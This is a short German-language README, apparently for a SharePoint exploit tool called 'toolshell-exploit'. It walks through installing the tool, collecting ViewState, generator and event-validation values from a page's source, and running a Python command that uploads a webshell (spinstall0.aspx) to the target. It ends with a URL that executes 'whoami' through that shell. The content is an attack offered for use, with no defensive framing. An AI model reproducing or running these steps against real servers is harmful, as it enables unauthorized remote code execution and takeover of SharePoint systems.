
Mit diesem Paket können Sie:
git clone <this-repo>
cd toolshell-exploit
pip3 install -r requirements.txt
Webshell hochladen
Auf einer SharePoint-Seite kannst du auf den Seitenquelltext zugreifen. Gehe einfach auf den Tab „Quelltext anzeigen“ und von dort erhältst du, falls verfügbar, Folgendes, das du kopieren kannst:
A) __VIEWSTATEGENERATOR
B) __EVENTVALIDATION
C) (beliebige aktuelle __VIEWSTATE für den Kontext)
python3 toolshell_exploit.py \
--target https://sharepoint.local \
--viewstate "<any_BASE64_VIEWSTATE>" \
--generator "<VIEWSTATEGENERATOR>" \
--eventval "<EVENTVALIDATION>"
Dadurch wird spinstall0.aspx hochgeladen. Prüfen: https://sharepoint.local/_layouts/15/spinstall0.aspx?cmd=whoami